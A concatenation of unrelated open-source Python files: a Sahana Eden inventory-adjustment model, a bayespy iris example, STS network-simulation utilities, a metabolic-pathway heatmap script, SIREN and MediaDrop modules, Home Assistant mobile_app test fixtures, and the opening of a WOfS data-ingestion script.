"""
record = r.record
if record:
T = current.T
footer = DIV(TABLE(TR(TH(T("Delivered By")),
TH(T("Date")),
TH(T("Function")),
TH(T("Name")),
TH(T("Signature")),
),
TR(TD(),
TD(),
TD(),
TD(),
TD(),
),
TR(TH(T("Received By")),
TH(T("Date")),
TH(T("Function")),
TH(T("Name")),
TH(T("Signature / Stamp")),
),
TR(TD(),
TD(),
TD(),
TD(),
TD(),
),
))
return footer
return None
# =============================================================================
class S3InventoryAdjustModel(S3Model):
"""
A module to manage the shipment of inventory items
- Sent Items
- Received Items
- And audit trail of the shipment process
"""
names = ("inv_adj",
"inv_adj_item",
"inv_adj_item_id",
)
def model(self):
T = current.T
db = current.db
auth = current.auth
settings = current.deployment_settings
track_pack_values = settings.get_inv_track_pack_values()
organisation_id = self.org_organisation_id
org_site_represent = self.org_site_represent
UNKNOWN_OPT = current.messages.UNKNOWN_OPT
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# ---------------------------------------------------------------------
# Adjustments
#
adjust_type = {0 : T("Shipment"),
1 : T("Inventory"),
}
adjust_status = {0 : T("In Process"),
1 : T("Complete"),
}
tablename = "inv_adj"
define_table(tablename,
self.super_link("doc_id", "doc_entity"),
self.pr_person_id(name = "adjuster_id",
label = T("Actioning officer"),
ondelete = "RESTRICT",
default = auth.s3_logged_in_person(),
comment = self.pr_person_comment(child="adjuster_id")
),
# This is a reference, not a super-link, so we can override
Field("site_id", self.org_site,
label = current.deployment_settings.get_inv_facility_label(),
ondelete = "SET NULL",
default = auth.user.site_id if auth.is_logged_in() else None,
requires = IS_ONE_OF(db, "org_site.site_id",
lambda id, row: \
org_site_represent(id, row,
show_link=False),
instance_types = auth.org_site_types,
updateable = True,
sort = True,
),
represent=org_site_represent),
s3_date("adjustment_date",
default = "now",
writable = False
),
Field("status", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(adjust_status)),
represent = lambda opt: \
adjust_status.get(opt, UNKNOWN_OPT),
default = 0,
label = T("Status"),
writable = False
),
Field("category", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(adjust_type)),
represent = lambda opt: \
adjust_type.get(opt, UNKNOWN_OPT),
default = 1,
label = T("Type"),
writable = False,
),
s3_comments(),
*s3_meta_fields())
self.configure(tablename,
super_entity = "doc_entity",
onaccept = self.inv_adj_onaccept,
create_next = URL(args=["[id]", "adj_item"]),
)
# Components
self.add_components(tablename,
inv_adj_item = "adj_id",
)
# Reusable Field
adj_id = S3ReusableField("adj_id", "reference %s" % tablename,
label = T("Inventory Adjustment"),
ondelete = "RESTRICT",
represent = self.inv_adj_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "inv_adj.id",
self.inv_adj_represent,
orderby="inv_adj.adjustment_date",
sort=True)),
sortby = "date",
)
adjust_reason = {0 : T("Unknown"),
1 : T("None"),
2 : T("Lost"),
3 : T("Damaged"),
4 : T("Expired"),
5 : T("Found"),
6 : T("Transfer Ownership"),
7 : T("Issued without Record"),
7 : T("Distributed without Record"),
}
# CRUD strings
if settings.get_inv_stock_count():
ADJUST_STOCK = T("New Stock Count")
crud_strings["inv_adj"] = Storage(
label_create = ADJUST_STOCK,
title_display = T("Stock Count Details"),
title_list = T("Stock Counts"),
title_update = T("Edit Stock Count"),
label_list_button = T("List Stock Counts"),
label_delete_button = T("Delete Stock Count"),
msg_record_created = T("Stock Count created"),
msg_record_modified = T("Stock Count modified"),
msg_record_deleted = T("Stock Count deleted"),
msg_list_empty = T("No stock counts have been done"))
else:
ADJUST_STOCK = T("New Stock Adjustment")
crud_strings["inv_adj"] = Storage(
label_create = ADJUST_STOCK,
title_display = T("Stock Adjustment Details"),
title_list = T("Stock Adjustments"),
title_update = T("Edit Adjustment"),
label_list_button = T("List Stock Adjustments"),
label_delete_button = T("Delete Stock Adjustment"),
msg_record_created = T("Adjustment created"),
msg_record_modified = T("Adjustment modified"),
msg_record_deleted = T("Adjustment deleted"),
msg_list_empty = T("No stock adjustments have been done"))
# ---------------------------------------------------------------------
# Adjustment Items
#
inv_item_status_opts = self.inv_item_status_opts
tablename = "inv_adj_item"
define_table(tablename,
# Original inventory item
self.inv_item_id(ondelete = "RESTRICT",
readable = False,
writable = False),
self.supply_item_id(
ondelete = "RESTRICT"
),
self.supply_item_pack_id(
ondelete = "SET NULL"
),
Field("old_quantity", "double", notnull=True,
label = T("Original Quantity"),
default = 0,
writable = False),
Field("new_quantity", "double",
label = T("Revised Quantity"),
represent = self.qnty_adj_repr,
requires = IS_NOT_EMPTY(),
),
Field("reason", "integer",
label = T("Reason"),
requires = IS_IN_SET(adjust_reason),
default = 1,
represent = lambda opt: \
adjust_reason.get(opt, UNKNOWN_OPT),
writable = False),
Field("old_pack_value", "double",
readable = track_pack_values,
writable = track_pack_values,
label = T("Original Value per Pack")),
Field("new_pack_value", "double",
readable = track_pack_values,
writable = track_pack_values,
label = T("Revised Value per Pack")),
s3_currency(readable = track_pack_values,
writable = track_pack_values),
Field("old_status", "integer",
label = T("Current Status"),
requires = IS_EMPTY_OR(IS_IN_SET(inv_item_status_opts)),
represent = lambda opt: \
inv_item_status_opts.get(opt, UNKNOWN_OPT),
default = 0,
writable = False),
Field("new_status", "integer",
label = T("Revised Status"),
requires = IS_EMPTY_OR(IS_IN_SET(inv_item_status_opts)),
represent = lambda opt: \
inv_item_status_opts.get(opt, UNKNOWN_OPT),
default = 0,),
s3_date("expiry_date",
label = T("Expiry Date")),
Field("bin", "string", length=16,
label = T("Bin"),
# @ToDo:
#widget = S3InvBinWidget("inv_adj_item")
),
# Organisation that owned this item before
organisation_id(name = "old_owner_org_id",
label = T("Current Owned By (Organization/Branch)"),
ondelete = "SET NULL",
writable = False),
# Organisation that owns this item now
organisation_id(name = "new_owner_org_id",
label = T("Transfer Ownership To (Organization/Branch)"),
ondelete = "SET NULL"),
adj_id(),
s3_comments(),
*s3_meta_fields())
# Reusable Field
adj_item_id = S3ReusableField("adj_item_id", "reference %s" % tablename,
label = T("Inventory Adjustment Item"),
ondelete = "RESTRICT",
represent = self.inv_adj_item_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "inv_adj_item.id",
self.inv_adj_item_represent,
orderby="inv_adj_item.item_id",
sort=True)),
sortby = "item_id",
)
# CRUD strings
crud_strings["inv_adj_item"] = Storage(
label_create = T("Add Item to Stock"),
title_display = T("Item Details"),
title_list = T("Items in Stock"),
title_update = T("Adjust Item Quantity"),
label_list_button = T("List Items in Stock"),
#label_delete_button = T("Remove Item from Stock"), # This should be forbidden - set qty to zero instead
msg_record_created = T("Item added to stock"),
msg_record_modified = T("Item quantity adjusted"),
#msg_record_deleted = T("Item removed from Stock"), # This should be forbidden - set qty to zero instead
msg_list_empty = T("No items currently in stock"))
return dict(inv_adj_item_id = adj_item_id,
)
# -------------------------------------------------------------------------
@staticmethod
def qnty_adj_repr(value):
"""
Make unadjusted quantities show up in bold
"""
if value is None:
return B(value)
else:
return value
# ---------------------------------------------------------------------
@staticmethod
def inv_adj_onaccept(form):
"""
When an adjustment record is created and it is of type inventory
then an adj_item record for each inv_inv_item in the site will be
created. If needed, extra adj_item records can be created later.
"""
id = form.vars.id
db = current.db
inv_item_table = db.inv_inv_item
adjitemtable = db.inv_adj_item
adjtable = db.inv_adj
adj_rec = adjtable[id]
if adj_rec.category == 1:
site_id = form.vars.site_id
# Only get inv. item with a positive quantity
query = (inv_item_table.site_id == site_id) & \
(inv_item_table.quantity > 0) & \
(inv_item_table.deleted == False)
row = db(query).select()
for inv_item in row:
# add an adjustment item record
adjitemtable.insert(reason = 0,
adj_id = id,
inv_item_id = inv_item.id, # original source inv_item
item_id = inv_item.item_id, # the supply item
item_pack_id = inv_item.item_pack_id,
old_quantity = inv_item.quantity,
currency = inv_item.currency,
old_status = inv_item.status,
new_status = inv_item.status,
old_pack_value = inv_item.pack_value,
new_pack_value = inv_item.pack_value,
expiry_date = inv_item.expiry_date,
bin = inv_item.bin,
old_owner_org_id = inv_item.owner_org_id,
new_owner_org_id = inv_item.owner_org_id,
)
# ---------------------------------------------------------------------
@staticmethod
def inv_adj_represent(id, row=None, show_link=True):
"""
Represent an Inventory Adjustment
"""
if row:
table = current.db.inv_adj
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.inv_adj
row = db(table.id == id).select(table.adjustment_date,
table.adjuster_id,
limitby=(0, 1)).first()
try:
repr = "%s - %s" % (table.adjuster_id.represent(row.adjuster_id),
table.adjustment_date.represent(row.adjustment_date)
)
except:
return current.messages.UNKNOWN_OPT
else:
if show_link:
return SPAN(repr)
else:
return repr
# ---------------------------------------------------------------------
@staticmethod
def inv_adj_item_represent(id, row=None, show_link=True):
"""
Represent an Inventory Adjustment Item
"""
if row:
table = current.db.inv_adj_item
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.inv_adj_item
row = db(table.id == id).select(table.item_id,
table.old_quantity,
table.new_quantity,
table.item_pack_id,
limitby=(0, 1)).first()
changed_quantity = 0
try:
if row.new_quantity and row.old_quantity:
changed_quantity = row.new_quantity - row.old_quantity
repr = "%s:%s %s" % (table.item_id.represent(row.item_id,
show_link=show_link),
changed_quantity,
table.item_pack_id.represent(row.item_pack_id),
)
except:
return current.messages.UNKNOWN_OPT
else:
if show_link:
return SPAN(repr)
else:
return repr
# =============================================================================
def inv_adj_rheader(r):
""" Resource Header for Inventory Adjustments """
if r.representation == "html" and r.name == "adj":
record = r.record
if record:
T = current.T
tabs = [(T("Edit Details"), None),
(T("Items"), "adj_item"),
(T("Photos"), "image"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
rheader = DIV(TABLE(
TR(TH("%s: " % table.adjuster_id.label),
table.adjuster_id.represent(record.adjuster_id),
TH("%s: " % table.adjustment_date.label),
table.adjustment_date.represent(record.adjustment_date),
),
TR(TH("%s: " % table.site_id.label),
table.site_id.represent(record.site_id),
TH("%s: " % table.category.label),
table.category.represent(record.category),
),
))
if record.status == 0: # In process
if current.auth.s3_has_permission("update", "inv_adj",
record_id=record.id):
# aitable = current.s3db.inv_adj_item
# query = (aitable.adj_id == record.id) & \
# (aitable.new_quantity == None)
# row = current.db(query).select(aitable.id,
# limitby=(0, 1)).first()
# if row == None:
close_btn = A( T("Complete Adjustment"),
_href = URL(c = "inv",
f = "adj_close",
args = [record.id]
),
_id = "adj_close",
_class = "action-btn"
)
close_btn_confirm = SCRIPT("S3.confirmClick('#adj_close', '%s')"
% T("Do you want to complete & close this adjustment?") )
rheader.append(close_btn)
rheader.append(close_btn_confirm)
rheader.append(rheader_tabs)
# else:
# msg = T("You need to check all the revised quantities before you can close this adjustment")
# rfooter.append(SPAN(msg))
return rheader
return None
# =============================================================================
# Generic function called by the duplicator methods to determine if the
# record already exists on the database.
def duplicator(job, query):
"""
This callback will be called when importing records it will look
to see if the record being imported is a duplicate.
@param job: An S3ImportJob object which includes all the details
of the record being imported
If the record is a duplicate then it will set the job method to update
"""
table = job.table
_duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if _duplicate:
job.id = _duplicate.id
job.data.id = _duplicate.id
job.method = job.METHOD.UPDATE
return _duplicate.id
return False
# =============================================================================
class inv_InvItemRepresent(S3Represent):
def __init__(self):
"""
Constructor
"""
super(inv_InvItemRepresent, self).__init__(lookup = "inv_inv_item")
# -------------------------------------------------------------------------
def lookup_rows(self, key, values, fields=[]):
"""
Custom rows lookup
@param key: the key Field
@param values: the values
@param fields: unused (retained for API compatibility)
"""
s3db = current.s3db
itable = s3db.inv_inv_item
stable = s3db.supply_item
left = stable.on(stable.id == itable.item_id)
if len(values) == 1:
query = (key == values[0])
else:
query = key.belongs(values)
rows = current.db(query).select(itable.id,
stable.name,
stable.um,
itable.item_source_no,
itable.bin,
itable.expiry_date,
itable.owner_org_id,
left=left)
self.queries += 1
# Bulk-represent owner_org_ids
organisation_id = str(itable.owner_org_id)
organisation_ids = [row[organisation_id] for row in rows]
if organisation_ids:
itable.owner_org_id.represent.bulk(organisation_ids)
return rows
# -------------------------------------------------------------------------
def represent_row(self, row):
"""
Represent a row
@param row: the Row
"""
itable = current.s3db.inv_inv_item
iitem = row.inv_inv_item
sitem = row.supply_item
stringify = lambda string: string if string else ""
ctn = stringify(iitem.item_source_no)
org = itable.owner_org_id.represent(iitem.owner_org_id)
bin = stringify(iitem.bin)
expires = iitem.expiry_date
if expires:
expires = "expires: %s" % \
S3DateTime.date_represent(expires, utc=True)
else:
expires = ""
NONE = current.messages["NONE"]
items = []
append = items.append
for string in [sitem.name, expires, ctn, org, bin]:
if string and string != NONE:
append(string)
append(" - ")
return TAG[""](items[:-1])
# END =========================================================================
|
import pandas as pd
import bayespy
from bayespy.network import Builder as builder
import logging
import os
import numpy as np
import scipy.stats as ss
import matplotlib.pyplot as plt
import seaborn as sns
def main():
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO)
bayespy.jni.attach(logger)
db_folder = bayespy.utils.get_path_to_parent_dir(__file__)
iris = pd.read_csv(os.path.join(db_folder, "data/iris.csv"), index_col=False)
network = bayespy.network.create_network()
cluster = builder.create_cluster_variable(network, 4)
node = builder.create_multivariate_continuous_node(network, iris.drop('iris_class',axis=1).columns.tolist(), "joint")
builder.create_link(network, cluster, node)
class_variable = builder.create_discrete_variable(network, iris, 'iris_class', iris['iris_class'].unique())
builder.create_link(network, cluster, class_variable)
head_variables = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width']
with bayespy.data.DataSet(iris, db_folder, logger) as dataset:
model = bayespy.model.NetworkModel(network, logger)
model.train(dataset)
queries = [bayespy.model.QueryConditionalJointProbability(
head_variables=[v],
tail_variables=['iris_class']) for v in head_variables]
(engine, _, _) = bayespy.model.InferenceEngine(network).create()
query = bayespy.model.SingleQuery(network, engine, logger)
results = query.query(queries, aslist=True)
jd = bayespy.visual.JointDistribution()
fig = plt.figure(figsize=(10,10))
for i, r in enumerate(list(results)):
ax = fig.add_subplot(2, 2, i+1)
jd.plot_distribution_with_variance(ax, iris, queries[i].get_head_variables(), r)
plt.show()
if __name__ == "__main__":
main()
|
# Copyright 2011-2013 Colin Scott
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pox.openflow.software_switch import OFConnection
from pox.openflow.libopenflow_01 import ofp_flow_mod
from pox.lib.addresses import EthAddr, IPAddr
import time
import re
import os
import sys
import errno
import socket
import random
import types
import struct
import shutil
import base64
import subprocess
import warnings
import functools
import importlib
from sts.util.console import msg
# don't use the standard instance - we don't want to be seeded
true_random = random.Random()
def is_sorted(l):
return all(l[i] <= l[i+1] for i in xrange(len(l)-1))
def is_strictly_sorted(l):
return all(l[i] < l[i+1] for i in xrange(len(l)-1))
def timestamp_string():
return time.strftime("%Y_%m_%d_%H_%M_%S", time.localtime())
def find(f, seq):
"""Return first item in sequence where f(item) == True."""
for item in seq:
if f(item):
return item
def find_index(f, seq):
"""Return the index of the first item in sequence where f(item) == True."""
for index, item in enumerate(seq):
if f(item):
return index
def mkdir_p(dst):
try:
os.makedirs(dst)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(dst):
pass
else:
raise
def rm_rf(dst):
try:
if os.path.exists(dst):
shutil.rmtree(dst)
except OSError:
pass
def create_python_dir(results_dir):
mkdir_p(results_dir)
with file(results_dir + "/__init__.py", 'a'):
pass
def create_clean_python_dir(results_dir):
if os.path.exists(results_dir):
print >> sys.stderr, "Results dir %s already exists. Overwriting.." % results_dir
rm_rf(results_dir)
create_python_dir(results_dir)
def random_eth_addr():
return EthAddr(struct.pack("Q", true_random.randint(1,0xFF))[:6])
def random_ip_addr():
return IPAddr(true_random.randint(0,0xFFFFFFFF))
def address_is_ip(address):
return re.match("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", address)
def port_used(address='127.0.0.1', port=6633):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.bind((address, port))
s.listen(1)
s.close()
return False
except socket.error:
return True
def find_port(port_spec):
if isinstance(port_spec, xrange):
port_spec = list(port_spec)
port_gen = None
if isinstance(port_spec, int):
def port_gen():
yield port_spec
raise Exception("Fixed port %d is busy. Consider specifying a range or a lambda " % port_spec)
elif isinstance(port_spec, list):
def port_gen():
cands = list(port_spec)
true_random.shuffle(cands)
for c in cands:
yield c
raise Exception("Port list/range %s exhausted" % str(port_spec))
elif isinstance(port_spec, types.FunctionType) or isinstance(port_spec, types.LambdaType):
port_gen = port_spec
gen = port_gen()
for _ in range(0,100):
candidate = gen.next()
if not port_used(port=candidate):
return candidate
raise Exception("Could not find a port in 100 tries")
# TODO(cs): this function don't appear to be invoked?
def find_ports(**kwargs):
return { k : find_port(v) for k, v in kwargs.iteritems() }
class ExitCode(object):
def __init__(self, exit_code):
self.exit_code = exit_code
def base64_encode_raw(packet):
'''
Calling pack() on a Openflow message might modify/add an XID.
'''
# base 64 occasionally adds extraneous newlines: bit.ly/aRTmNu
return base64.b64encode(packet).replace("\n", "")
def base64_encode(packet):
if hasattr(packet, "pack"):
packet = packet.pack()
# base 64 occasionally adds extraneous newlines: bit.ly/aRTmNu
return base64.b64encode(packet).replace("\n", "")
def base64_decode(data):
return base64.b64decode(data)
def base64_decode_openflow(data):
(msg, packet_length) = OFConnection.parse_of_packet(base64_decode(data))
return msg
def is_flow_mod(receive_event):
return type(base64_decode_openflow(receive_event.b64_packet)) == ofp_flow_mod
class IPAddressSpace(object):
_claimed_addresses = set()
@staticmethod
def register_address(address):
if address in IPAddressSpace._claimed_addresses:
raise ValueError("Address %s already claimed" % address)
IPAddressSpace._claimed_addresses.add(address)
@staticmethod
def find_unclaimed_address(ip_prefix="192.168.1"):
''' Find an unclaimed IP address in the given /24 range (may be specified
as a full IP address for convenience).
'''
octects = ip_prefix.split(".")
if len(octects) == 4:
ip_prefix = ".".join(octects[0:3])
host_octect = 2
address = "%s.%d" % (ip_prefix, host_octect)
while host_octect <= 255 and address in IPAddressSpace._claimed_addresses:
host_octect += 1
address = "%s.%d" % (ip_prefix, host_octect)
if address in IPAddressSpace._claimed_addresses:
raise RuntimeError("Out of IP addresses in prefix %s" % ip_prefix)
return address
def backtick(cmd, *args, **kwargs):
return subprocess.Popen(cmd, *args, shell=True, stdout=subprocess.PIPE, **kwargs).stdout.read().strip()
def system(cmd, *args, **kwargs):
return subprocess.call(cmd, *args, shell=True, **kwargs)
def show_flow_tables(simulation):
for switch in simulation.topology.switches:
msg.interactive("Switch %s" % switch.dpid)
switch.show_flow_table()
def deprecated(func):
"""
This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emitted
when the function is used.
Copied from https://wiki.python.org/moin/PythonDecoratorLibrary
"""
@functools.wraps(func)
def new_func(*args, **kwargs):
warnings.warn_explicit(
"Call to deprecated function {}.".format(func.__name__),
category=DeprecationWarning,
filename=func.func_code.co_filename,
lineno=func.func_code.co_firstlineno + 1
)
return func(*args, **kwargs)
return new_func
def object_fullname(obj):
"""Return the fullname of an object"""
return obj.__module__ + "." + obj.__class__.__name__
def class_fullname(cls):
"""Return the fullname of a class"""
return cls.__module__ + "." + cls.__name__
def load_class(str_full_type):
"""
Load a python class given full qualified name.
"""
type_s = str_full_type.split('.')
mod = importlib.import_module('.'.join(type_s[:-1]))
cls = getattr(mod, type_s[-1])
return cls
def get_json_attr(obj):
"""
Returns the serialized version of the object if it has to_json() defined
"""
if hasattr(obj, "to_json"):
return getattr(obj, "to_json")()
else:
return obj
def base64_encode_flow(flow):
return None if flow is None else base64_encode(flow.to_flow_mod())
def base64_encode_flow_list(flows):
return None if flows is None else [base64_encode_flow(entry) for entry in flows]
def base64_encode_flow_table(flow_table):
return None if flow_table is None else base64_encode_flow_list(flow_table.table)
def get_port_no(obj):
"""
Try obj, obj.port_no, obj.port_no()
"""
if isinstance(obj, (basestring, int, long)):
return obj
if hasattr(obj, "port_no"):
port_no = getattr(obj, "port_no")
if isinstance(port_no, (basestring, int, long)):
return port_no
try:
port_no = port_no()
if isinstance(port_no, (basestring, int, long)):
return port_no
return str(port_no)
except:
return str(port_no)
return str(obj)
|
# coding: utf-8
#Import the libraries
import sys
from sys import argv
args = sys.argv
import numpy as np
import seaborn as sns
import matplotlib.pylab as plt
import pandas as pd
import numpy as np
import matplotlib
#Customize background and pallete colors
sns.set_style("darkgrid")
filename = args[1]
df = pd.read_table(filename, index_col=0, sep="\t")
df_comp=df.drop(['sulfur', 'carbon','oxygen','iron','nitrogen','<sulfur comp>', '<carbon comp>'],axis=1)
df_comp.rename(columns={'sulfur_1': 'Sulfite oxidation',
'sulfur_2':'Thiosulfate oxidation',
'sulfur_3':'Tetrathionate oxidation',
'sulfur_4':'Tetrathionate reduction',
'sulfur_5':'Sulfate reduction DS',
'sulfur_6':'Elemental sulfur reduction',
'sulfur_7':'Thiosulfate disproportion',
'sulfur_8':'Carbon disulfide oxidation',
'sulfur_9':'Alkanesulfonate degradation',
'sulfur_10':'Sulfate reduction A',
'sulfur_11':'Sulfide oxidation',
'sulfur_12':'Cysteate oxidation',
'sulfur_13':'Dimethylsulfone oxidation',
'sulfur_14':'Sulfoacetate oxidation',
'sulfur_15':'Sulfolactate oxidation',
'sulfur_16':'DMS oxidation',
'sulfur_17':'DMSP oxidation',
'sulfur_18':'MTP oxidation',
'sulfur_19':'Suloacetaldehyde oxidation',
'sulfur_20':'Elemental sulfur oxidation',
'sulfur_21':'Elemental sulfur disproportion',
'sulfur_22':'Methanesulfonate oxidation',
'sulfur_23':'Taurine oxidation',
'sulfur_24':'DMS methanogenesis',
'sulfur_25':'MTP methanogesis',
'sulfur_26':'Methanethiol methanogenesis',
'sulfur_27':'Homotaurine degradation',
'sulfur_28':'SQDG biosynthesis',
'sulfur_29':'Marker genes',
'carbon_1':'coenzyme B/coenzyme M regeneration I (methanophenazine-dependent)',
'carbon_2': 'Methane oxidation, methanotroph, methane => formaldehyde',
'carbon_3': 'methanogenesis energy conservation',
'carbon_4': 'Methanogenesis, acetate => methane (M00357)',
'carbon_5':'Methanogenesis, methylamine/dimethylamine/trimethylamine => methane',
'carbon_6':'Methanogenesis from dimethylsulfide/methanethiol/methlthiolpropanoate => methane',
'carbon_7':'Methanogenesis, CO2 => methane',
'carbon_8':'methanogenesis from acetate reductive acetyl coenzyme A pathway II (autotrophic methanogens)',
'carbon_9':'Methanogenesis, methanol => methane',
'carbon_10':'methylamine degradation',
'carbon_12':'methyl-coenzyme M oxidation to CO2',
'carbon_13':'methyl-coenzyme M reduction to methane' },inplace=True)
df_comp=df_comp.T
sns.set(font_scale=1)
axs = sns.clustermap(df_comp, col_cluster=True, linewidths=0.6,cmap=sns.color_palette("RdBu_r", 100),
figsize=(15,12))
plt.tight_layout()
plt.savefig(argv[1]+".png", bbox_inches='tight', dpi=500)
plt.close()
|
#!/usr/bin/python3
#
# Copyright (C) 2015-2019 Sustainable Energy Now Inc., Angus King
#
# getparents.py - This file is part of SIREN.
#
# SIREN is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# SIREN is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General
# Public License along with SIREN. If not, see
# <http://www.gnu.org/licenses/>.
#
def getParents(aparents):
parents = []
for key, value in aparents:
for key2, value2 in aparents:
if key2 == key:
continue
value = value.replace(key2, value2)
for key2, value2 in parents:
if key2 == key:
continue
value = value.replace(key2, value2)
parents.append((key, value))
return parents
|
# This file is a part of MediaDrop (http://www.mediadrop.net),
# Copyright 2009-2013 MediaCore Inc., Felix Schwarz and other contributors.
# For the exact contribution history, see the git revision log.
# The source code contained in this file is licensed under the GPLv3 or
# (at your option) any later version.
# See LICENSE.txt in the main project directory, for more information.
"""
Comment Model
Comments come with two status flags:
* reviewed
* publishable
"""
from datetime import datetime
from sqlalchemy import Table, ForeignKey, Column, sql
from sqlalchemy.types import BigInteger, Boolean, DateTime, Integer, Unicode, UnicodeText
from sqlalchemy.orm import mapper, relation, backref, synonym, composite, column_property, validates, interfaces, \
Query, dynamic_loader
from mediacore.model import AuthorWithIP
from mediacore.model.meta import DBSession, metadata
from mediacore.plugin import events
comments = Table('comments', metadata,
Column('id', Integer, autoincrement=True, primary_key=True),
Column('media_id', Integer, ForeignKey('media.id', onupdate='CASCADE', ondelete='CASCADE')),
Column('comment_id', Integer, ForeignKey('comments.id', onupdate='CASCADE', ondelete='CASCADE')),
Column('subject', Unicode(100)),
Column('created_on', DateTime, default=datetime.now, nullable=False),
Column('modified_on', DateTime, default=datetime.now, onupdate=datetime.now, nullable=False),
Column('reviewed', Boolean, default=False, nullable=False),
Column('publishable', Boolean, default=False, nullable=False),
Column('author_name', Unicode(50), nullable=False),
Column('author_email', Unicode(255)),
Column('author_ip', BigInteger, nullable=False),
Column('body', UnicodeText, nullable=False),
Column('level', Integer, nullable=False, default=0),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
class CommentQuery(Query):
def published(self, flag=True):
return self.filter(Comment.publishable == flag)
def reviewed(self, flag=True):
return self.filter(Comment.reviewed == flag)
def trash(self, flag=True):
filter = sql.and_(Comment.reviewed == True,
Comment.publishable == False)
if flag:
return self.filter(filter)
else:
return self.filter(sql.not_(filter))
def subcomment(self, comment_id=None):
return self.published().filter(Comment.comment_id == comment_id)
def search(self, q):
q = '%' + q + '%'
return self.filter(sql.or_(
Comment.subject.like(q),
Comment.body.like(q),
))
class Comment(object):
"""Comment Model
.. attribute:: type
The relation name to use when looking up the parent object of this Comment.
This is the name of the backref property which can be used to find the
object that this Comment belongs to. Our convention is to have a controller
by this name, with a 'view' action which accepts a slug, so we can
auto-generate links to any comment's parent.
.. attribute:: author
An instance of :class:`mediacore.model.author.AuthorWithIP`.
"""
query = DBSession.query_property(CommentQuery)
def __repr__(self):
return '<Comment: %r subject=%r>' % (self.id, self.subject)
def __unicode__(self):
return self.subject
@property
def type(self):
if self.media_id:
return 'media'
return None
def _get_parent(self):
return self.media or None
def _set_parent(self, parent):
self.media = parent
parent = property(_get_parent, _set_parent, None, """
The object this Comment belongs to, provided for convenience mostly.
If the parent has not been eagerloaded, a query is executed automatically.
""")
mapper(Comment, comments, order_by=comments.c.created_on, extension=events.MapperObserver(events.Comment), properties={
'author': composite(AuthorWithIP,
comments.c.author_name,
comments.c.author_email,
comments.c.author_ip),
'comments': dynamic_loader(
Comment,
# backref='comment',
query_class=CommentQuery,
passive_deletes=True,
doc="""A query pre-filtered for associated comments.
Returns :class:`mediacore.model.comments.CommentQuery`."""
),
})
|
"""Tests for mobile_app component."""
# pylint: disable=redefined-outer-name,unused-import
import pytest
from homeassistant.components.mobile_app.const import DOMAIN
from homeassistant.setup import async_setup_component
from .const import REGISTER, REGISTER_CLEARTEXT
@pytest.fixture
async def create_registrations(hass, authed_api_client):
"""Return two new registrations."""
await async_setup_component(hass, DOMAIN, {DOMAIN: {}})
enc_reg = await authed_api_client.post(
"/api/mobile_app/registrations", json=REGISTER
)
assert enc_reg.status == 201
enc_reg_json = await enc_reg.json()
clear_reg = await authed_api_client.post(
"/api/mobile_app/registrations", json=REGISTER_CLEARTEXT
)
assert clear_reg.status == 201
clear_reg_json = await clear_reg.json()
await hass.async_block_till_done()
return (enc_reg_json, clear_reg_json)
@pytest.fixture
async def push_registration(hass, authed_api_client):
"""Return registration with push notifications enabled."""
await async_setup_component(hass, DOMAIN, {DOMAIN: {}})
enc_reg = await authed_api_client.post(
"/api/mobile_app/registrations",
json={
**REGISTER,
"app_data": {
"push_url": "http://localhost/mock-push",
"push_token": "abcd",
},
},
)
assert enc_reg.status == 201
return await enc_reg.json()
@pytest.fixture
async def webhook_client(hass, authed_api_client, aiohttp_client):
"""mobile_app mock client."""
# We pass in the authed_api_client server instance because
# it is used inside create_registrations and just passing in
# the app instance would cause the server to start twice,
# which caused deprecation warnings to be printed.
return await aiohttp_client(authed_api_client.server)
@pytest.fixture
async def authed_api_client(hass, hass_client):
"""Provide an authenticated client for mobile_app to use."""
await async_setup_component(hass, DOMAIN, {DOMAIN: {}})
await hass.async_block_till_done()
return await hass_client()
@pytest.fixture(autouse=True)
async def setup_ws(hass):
"""Configure the websocket_api component."""
assert await async_setup_component(hass, "websocket_api", {})
await hass.async_block_till_done()
|
#!/bin/env python
# coding=utf-8
"""
Ingest data from the command-line.
' '.join(['{}_{}'.format(x, y) for x in range(138, 140+1) for y in range(-31, -33-1, -1)])
138_-31 138_-32 138_-33 139_-31 139_-32 139_-33 140_-31 140_-32 140_-33
for i in 138_-031 138_-032 138_-033 139_-031 139_-032 139_-033 140_-031 140_-032 140_-033
do
oldwofs_prepare.py --output oldwofs_${i}.yaml /g/data/fk4/wofs/current/extents/${i}/*.tif
done
"""
from __future__ import absolute_import
import uuid
import click
import netCDF4
import rasterio
import yaml
from yaml import CDumper
from datetime import datetime
import re
from pathlib import Path
from concurrent.futures import ThreadPoolExecutor, as_completed, ProcessPoolExecutor
def prepare_datasets_netcdf(nc_file):
"""
Don't use this, turns out the old WOfS netcdfs are of an 'alternative' structure, and can't be opened
by GDAL/rasterio.
"""
image = netCDF4.Dataset(nc_file)
times = image['time']
projection = 'EPSG:4326'
x, dx, _, y, _, dy = (float(n) for n in image['crs'].GeoTransform)
